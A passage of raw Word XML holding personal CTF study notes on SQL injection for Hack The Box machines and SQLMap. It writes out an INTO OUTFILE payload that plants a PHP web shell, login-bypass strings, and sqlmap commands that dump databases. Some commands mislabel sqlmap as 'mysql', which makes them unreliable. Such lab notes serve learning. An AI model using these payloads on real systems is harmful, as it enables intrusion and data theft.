      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001837">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001838">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Validation HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> teaches us how to do 2nd order (second order) SQL injection, how to test for it, and how to get a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web shell from a SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowing that we can perform a Union Injection and that this is a PHP application, we can attempt to use the INTO OUTFILE statement of SQL to drop a web shell. We try injecting the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1430"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brazil' UNION SELECT "&lt;?php SYSTEM($_REQUEST['cmd']); ?&gt;" INTO OUTFILE '/var/www/html/shell.php'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to also visit the /account.php site after submitting the payload, since the query will not actually trigger until you try loading the page- hence, SQLi of the second order.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also uses SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cronos HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses SQL injection (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to get into Admin login page!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001840">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001841">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before, you try SQLMap, it's not a bad idea to test if it's vulnerable to SQL injections:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001842">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001843">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test' or 1=1;-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More examples down below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="991"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, in the Usage HTB, there was a password reset form, and it checked to see if your email was part of their records. If not, then it gave you an error message. So, we tried the above SQL injections and it gave a successful message, meaning that the SQL inject logic worked and we are allowed to SQL inject the input form. So, now we can use SQLMap</w:t>
      </w:r>
    </w:p>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use SQLMap from Kali Linux to automate SQL injections. It's always a good first step for hacking into websites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001848">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001849">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to use SQLMap but you already bypassed the login page, use a cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://target.com/restricted_page.php/search=*" --cookie="PHPSESSID=your_cookie"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If your GET/POST request looks like this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /dashboard.php?search=carsss HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then you know that your URL should look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://[IP]/dashboard.php/search=*" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The star helps SQLMap focus on that parameter for inject. If there are multiple parameters, then it will test all. But if you add the *, then it will only test that one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, if you only have one parameter, then it doesn't matter if you do a * or just put some random value like "carss"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001850">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use username and password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://target.com/restricted_page.php" --data="username=admin&amp;password=1234" --method=POST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001852">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the POST request, make sure that "username" and "password" are actually called "username" and "password". If not, then change it to match the format of the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001853">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1452"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure it's a POST. If not, get GET</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001854">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001855">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use SQLMap if you are at a login page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001856">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First use BurpSuite. Go to the log in page, put a value in for username and password, intercept the POST request, save it to a file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (right click the request and click on "Save Item")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001857">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001858">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once you have it saved (ex. request.txt), run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dbms=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR mysql -r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dbms=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses the intercepted request you saved earlier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells SQLMap what type of database management system it is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attempts to outputs the entire database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BATCH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used when you want to skip all the prompts to default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It defaults to "yes" for the simple ones and "no" for dangerous ones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001860">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
